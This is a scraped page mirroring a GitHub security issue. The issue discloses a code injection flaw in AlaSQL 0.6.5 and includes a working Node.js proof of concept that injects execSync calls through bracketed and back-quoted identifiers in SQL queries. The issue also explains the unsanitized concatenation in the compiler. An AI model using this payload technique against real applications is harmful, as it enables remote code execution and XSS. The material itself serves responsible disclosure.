Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Code Injection Vulnerability During Processing Literal

See original GitHub issue

Hi, I found a potential code injection vulnerability in the latest version (0.6.5) of AlaSQL.

Proof of Concept

Browser

http://jsfiddle.net/msoc7kL8/

Node.js

const alasql = require('alasql');

const genPayload = command => `
new Function(
    'return this.process.mainModule.require'
)()('child_process').execSync(${JSON.stringify(command)})
`;


res = alasql(
    // Initialize the database
    'CREATE table i_am_a_table;' +
    `INSERT INTO i_am_a_table VALUES (1337);` +

    // Code injection in four different ways
    `UPDATE i_am_a_table SET [0'+${genPayload(">&2 echo UPDATE pwned $(whoami)")}+']=42;` +
    `SELECT * from i_am_a_table where whatever=['+${genPayload(">&2 echo SELECT pwned $(whoami)")}+'];` +
    `SELECT \`'+${genPayload(">&2 echo SELECT pwned again, back-quote works too. $(whoami)")}+'\` from i_am_a_table where 1;` +
    `SELECT [whatever||${genPayload('>&2 echo calling function pwned')}||]('whatever');`
);

Description

AlaSQL doesn’t restrict the characters in square brackets [ ] or back-quote ` by design, that’s fine. But when we compile the SQL query to JavaScript code, those strings are concatenation into the generated JavaScript directly without any sanitization or escape, which can cause a code injection vulnerability.

For example, in the UPDATE PoC for browser, we can reference to the following code: https://github.com/agershun/alasql/blob/75846cfb85f717c70e2a6f316303b2881febd81a/src/74update.js#L58-L62

In this case, the col.column.columnid is 0'+alert("UPDATE pwned")+', and this string are directly concat into variable s in line 59. After that, the variable s are being appended to the functionBody argument for that new Function in line 62. Now, the alert statement will be execute when executing this SQL query.

Summary

Through this code injection vulnerability, if an attacker can control the SQL query (no matter it’s a by design feature or via SQL injection), then it might lead to a XSS in browser, or even RCE (remote code execution) in node.js application.

Issue Analytics

State:
Created 3 years ago
Reactions:2
Comments:12 (8 by maintainers)

Top GitHub Comments

1reaction

mathiasrwcommented, Mar 16, 2021

Found it!

1reaction

splitlinecommented, Mar 13, 2021

Hm, it’s weird, I think I sent to the correct email.

I’ve sent the PoC with my another email (splitline.cs09g [at] nctu.edu.tw) to you again, please check.

Top Results From Across the Web

Code Injection Vulnerability During Processing Literal #1302

Through this code injection vulnerability, if an attacker can control the SQL query (no matter it's a by design feature or via SQL...

5 ways to prevent code injection in JavaScript and Node.js

Secondly, avoid serialization which could be vulnerable to injection attacks that execute code in the serialization process.

Introduction to Software Security - Chapter 3.8.3: Code Injections

Learn how to mitigate code injections vulnerabilities. Examples are presented from Python, Perl, JavaScript and Ruby. Code Injection Attacks.

What is Code Injection and How to Avoid It - Invicti

An attacker exploiting a command injection vulnerability is limited to injecting commands of the underlying operating system, while a code ...

Detecting Code Injection Attacks with Precision and Efficiency

Injected code may steal data, compromise database integrity, and/or bypass authentication and access control, violating system correctness, security, and ...